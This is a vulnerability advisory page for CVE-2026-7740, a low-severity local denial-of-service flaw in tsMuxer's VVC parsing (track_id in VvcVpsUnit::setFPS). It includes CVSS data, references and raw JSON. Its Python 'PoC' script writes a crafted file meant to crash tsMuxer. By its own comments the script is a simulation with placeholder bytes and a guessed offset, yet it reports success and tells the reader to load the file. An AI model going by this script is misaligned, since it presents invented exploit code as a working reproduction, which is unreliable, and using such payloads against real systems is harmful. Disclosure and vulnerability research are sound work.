Security Vulnerability Report
CVE-2026-7740 CVSS 3.3 LOW

Published: 2026-05-04 07:16:02
Last Modified: 2026-05-04 15:17:59

Description

A security vulnerability has been detected in justdan96 tsMuxer up to 2.7.0. The issue affects the function VvcVpsUnit::setFPS in the file tsMuxer/vvc.cpp. Manipulation of the argument track_id leads to denial of service. The attack requires local access. The exploit has been disclosed publicly and may be used. This vulnerability only affects products that are no longer supported by the maintainer.

CVSS Details

CVSS Score: 3.3
Severity: LOW
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L

Configurations (Affected Products)

No configuration data available.

justdan96 tsMuxer <= 2.7.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# PoC for CVE-2026-7740
# Conceptual PoC demonstrating the trigger condition
import struct


def generate_exploit_file(filename):
    """
    Generates a crafted file that triggers the VvcVpsUnit::setFPS vulnerability.
    The exploit manipulates the track_id argument to cause a DoS.
    """
    # This is a simulated VVC VPS structure with a malicious track_id
    # Real implementation would require reverse engineering the exact binary format.

    # Header for a VVC NAL unit (simulation)
    # forbidden_zero_bit(1) + nuh_layer_id(6) + nuh_temporal_id_plus1(3)
    nal_header = bytes([0x00, 0x01, 0x02])

    # VPS data placeholder
    vps_data = b'\x00' * 10

    # The vulnerability is triggered by 'track_id'.
    # Assuming track_id is parsed as an integer at this offset.
    # Sending an unexpected large value or specific pattern to trigger the bug.
    # Based on typical DoS in C++, this might be an out-of-bounds index.
    malicious_track_id = struct.pack('<I', 0xFFFFFFFF)

    payload = nal_header + vps_data + malicious_track_id

    with open(filename, 'wb') as f:
        f.write(payload)

    print(f"[+] Exploit file '{filename}' generated successfully.")
    print(f"[+] Load this file in tsMuxer to trigger the Denial of Service.")


if __name__ == "__main__":
    generate_exploit_file("cve_2026_7740_poc.bin")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-7740", "sourceIdentifier": "[email protected]", "published": "2026-05-04T07:16:02.257", "lastModified": "2026-05-04T15:17:58.710", "vulnStatus": "Deferred", "cveTags": [{"sourceIdentifier": "[email protected]", "tags": ["unsupported-when-assigned"]}], "descriptions": [{"lang": "en", "value": "A security vulnerability has been detected in justdan96 tsMuxer up to 2.7.0. This issue affects the function VvcVpsUnit::setFPS of the file tsMuxer/vvc.cpp. Such manipulation of the argument track_id leads to denial of service. An attack has to be approached locally. The exploit has been disclosed publicly and may be used. This vulnerability only affects products that are no longer supported by the maintainer."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 1.9, "baseSeverity": "LOW", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": 
"NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L", "baseScore": 3.3, "baseSeverity": "LOW", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.8, "impactScore": 1.4}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:L/AC:L/Au:S/C:N/I:N/A:P", "baseScore": 1.7, "accessVector": "LOCAL", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "PARTIAL"}, "baseSeverity": "LOW", "exploitabilityScore": 3.1, "impactScore": 2.9, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-404"}]}], "references": [{"url": "https://github.com/justdan96/tsMuxer/", "source": "[email protected]"}, {"url": "https://github.com/justdan96/tsMuxer/issues/899", "source": "[email protected]"}, {"url": "https://github.com/user-attachments/files/16812319/poc5.zip", "source": "[email protected]"}, {"url": "https://vuldb.com/submit/807651", "source": "[email protected]"}, {"url": "https://vuldb.com/vuln/360915", "source": "[email protected]"}, {"url": "https://vuldb.com/vuln/360915/cti", "source": "[email protected]"}]}}